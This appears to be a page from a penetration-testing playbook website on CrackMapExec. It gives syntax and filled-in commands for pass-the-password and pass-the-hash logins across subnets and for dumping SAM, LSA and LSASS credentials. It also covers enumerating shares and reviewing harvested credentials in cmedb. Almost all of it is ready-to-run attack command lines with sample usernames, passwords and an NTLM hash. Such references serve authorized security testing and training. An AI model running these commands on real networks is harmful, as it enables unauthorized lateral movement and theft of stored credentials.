Tech With ZDefense PlaybookWeb Exploitation Playbook

CrackMapExec

Pass-the-Password

Syntax: crackmapexec smb [target ip] -u [user] -d [domain] -p [pass]

Domain Authentication
crackmapexec smb 172.16.1.0/24 -u jjones -p buyme_200sx -d alterave.local
CME: Pass-the-Password (Domain)
Local Authentication
crackmapexec smb 172.16.1.0/24 -u Administrator -p Password1! --local-auth
CME: Pass-the-Password (Local)

Pass-the-Hash

Pass-the-Hash attacks only work for NTLM hashes.

Syntax: crackmapexec smb [ip/cidr] -u [user] -H [hash] --local-auth

crackmapexec smb 172.16.1.0/24 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth
CME: Pass-the-Hash

CrackMapExec Attacks

SAM Dump

Syntax: crackmapexec smb [ip/cidr] -u [user] -H [hash] --local-auth --sam

crackmapexec smb 172.16.1.0/24 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth --sam
CME: SAM Dump

SMB Enumeration

Syntax: crackmapexec smb [ip/cidr] -u [user] -H [hash] --local-auth --shares

crackmapexec smb 172.16.1.0/24 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth --shares
CME: SMB Enumeration

LSA Dump

Syntax: crackmapexec smb [ip/cidr] -u [user] -H [hash] --local-auth --lsa

crackmapexec smb 172.16.1.0/24 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth --lsa
CME: LSA Dump

CrackMapExec Modules

LSASSY

Syntax: crackmapexec smb [ip/cidr] -u [user] -H [hash] --local-auth -M lsassy

crackmapexec smb 10.1.1.0/24 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth -M lsassy
CME: LSASSY

CMEDB

cmedb
CMEDB: Creds
PreviousPost-Compromise AttacksNextSecretsDump

Last updated